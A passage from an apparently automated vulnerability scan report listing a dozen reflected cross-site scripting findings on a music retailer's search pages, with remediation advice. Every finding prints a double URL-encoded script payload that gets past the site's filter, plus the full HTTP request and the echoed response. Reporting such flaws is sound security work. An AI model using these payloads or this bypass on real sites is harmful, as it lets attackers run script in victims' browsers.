The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Jana%20Huntere67c8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaad4d42f534&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rj87r3p0hfv02ucvg93fs01sr5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=20803814; expires=Sun, 09-Jan-2011 02:37:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=478548248; expires=Sun, 09-Jan-2011 02:37:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Jana Huntere67c8</title><script>alert(1)</script>aad4d42f534</title>
...[SNIP]...

1.156. http://www.insound.com/search/query/Jana%20Hunter&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Jana%20Hunter&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99918%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e284866e9e45 was submitted in the REST URL parameter 3. This input was echoed as 99918"><script>alert(1)</script>284866e9e45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Jana%20Hunter99918%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e284866e9e45&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=385355dritsklf27gqbeiu8tn2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=352752951; expires=Sun, 09-Jan-2011 02:37:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=194276469; expires=Sun, 09-Jan-2011 02:37:39 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Jana Hunter99918"><script>alert(1)</script>284866e9e45" />
...[SNIP]...

1.157. http://www.insound.com/search/query/John%20Talabot&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/John%20Talabot&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478380776a0 was submitted in the REST URL parameter 3. This input was echoed as ccf4f"><script>alert(1)</script>478380776a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/John%20Talabotccf4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478380776a0&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1jdrb0ti8kn6g2kebmorhsrv03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=127366689; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=371923705; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="John Talabotccf4f"><script>alert(1)</script>478380776a0" />
...[SNIP]...

1.158. http://www.insound.com/search/query/John%20Talabot&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/John%20Talabot&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d4820%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd42d753ba was submitted in the REST URL parameter 3. This input was echoed as d4820</title><script>alert(1)</script>1dd42d753ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/John%20Talabotd4820%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd42d753ba&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=r22dgslscj0c9ge9pkga6q94l0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=472193018; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=476381303; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>John Talabotd4820</title><script>alert(1)</script>1dd42d753ba</title>
...[SNIP]...

1.159. http://www.insound.com/search/query/Julio%20Bashmore&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Julio%20Bashmore&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b8107%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2414204422 was submitted in the REST URL parameter 3. This input was echoed as b8107</title><script>alert(1)</script>f2414204422 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Julio%20Bashmoreb8107%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2414204422&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=udk2kat5t69s3dnfhj2dderns6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=91970399; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=9726414; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Julio Bashmoreb8107</title><script>alert(1)</script>f2414204422</title>
...[SNIP]...

1.160. http://www.insound.com/search/query/Julio%20Bashmore&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Julio%20Bashmore&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2c3a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc9d6a819a5 was submitted in the REST URL parameter 3. This input was echoed as a2c3a"><script>alert(1)</script>fc9d6a819a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Julio%20Bashmorea2c3a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc9d6a819a5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=m7a420fnommr775gb176v0eus2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:00 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=446870310; expires=Sun, 09-Jan-2011 02:41:00 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=76962806; expires=Sun, 09-Jan-2011 02:41:00 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Julio Bashmorea2c3a"><script>alert(1)</script>fc9d6a819a5" />
...[SNIP]...

1.161. http://www.insound.com/search/query/Jónsi&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J..nsi&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 7ccdf%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f852360fdf was submitted in the REST URL parameter 3. This input was echoed as 7ccdf</title><script>alert(1)</script>6f852360fdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J7ccdf%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f852360fdf..nsi&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ohm63kc8mes205fb5tnci35m47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=278972899; expires=Sun, 09-Jan-2011 02:40:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=8301769; expires=Sun, 09-Jan-2011 02:40:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>J7ccdf</title><script>alert(1)</script>6f852360fdf..nsi</title>
...[SNIP]...

1.162. http://www.insound.com/search/query/Jónsi&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J..nsi&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69e453be2c1 was submitted in the REST URL parameter 3. This input was echoed as 7de97"><script>alert(1)</script>69e453be2c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J7de97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69e453be2c1..nsi&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=e311sjfc96gdr6ai01al6k79d0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=48822784; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=23335057; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="J7de97"><script>alert(1)</script>69e453be2c1..nsi" />
...[SNIP]...

1.163. http://www.insound.com/search/query/Kanye%20West&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Kanye%20West&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb080eef1911 was submitted in the REST URL parameter 3. This input was echoed as aac47"><script>alert(1)</script>b080eef1911 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Kanye%20Westaac47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb080eef1911&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3vl6i9b0o4s3glgvu38vvqj0o6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=27829969; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=495312237; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Kanye Westaac47"><script>alert(1)</script>b080eef1911" />
...[SNIP]...

1.164. http://www.insound.com/search/query/Kanye%20West&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Kanye%20West&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 5ee68%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0bdf6443693 was submitted in the REST URL parameter 3. This input was echoed as 5ee68</title><script>alert(1)</script>0bdf6443693 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Kanye%20West5ee68%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0bdf6443693&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=314muu0a19snilpbkfl115rqj3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=81453150; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=95018968; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Kanye West5ee68</title><script>alert(1)</script>0bdf6443693</title>
...[SNIP]...

1.165. http://www.insound.com/search/query/Kingdom&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Kingdom&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4b00b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbb23efea84 was submitted in the REST URL parameter 3. This input was echoed as 4b00b</title><script>alert(1)</script>bbb23efea84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Kingdom4b00b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbb23efea84&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=j5mr4i5vnqsr1a5sf8fvv2asf1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=63916027; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=284097053; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Kingdom4b00b</title><script>alert(1)</script>bbb23efea84</title>
...[SNIP]...

1.166. http://www.insound.com/search/query/Kingdom&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Kingdom&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b43%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef31507bff75 was submitted in the REST URL parameter 3. This input was echoed as f5b43"><script>alert(1)</script>f31507bff75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Kingdomf5b43%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef31507bff75&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=v221qk7rs6rkojp3n1483lr9b4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=401865232; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=157031852; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Kingdomf5b43"><script>alert(1)</script>f31507bff75" />
...[SNIP]...

1.167. http://www.insound.com/search/query/Koen%20Holtkamp&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Koen%20Holtkamp&from=47597/

Issue detail

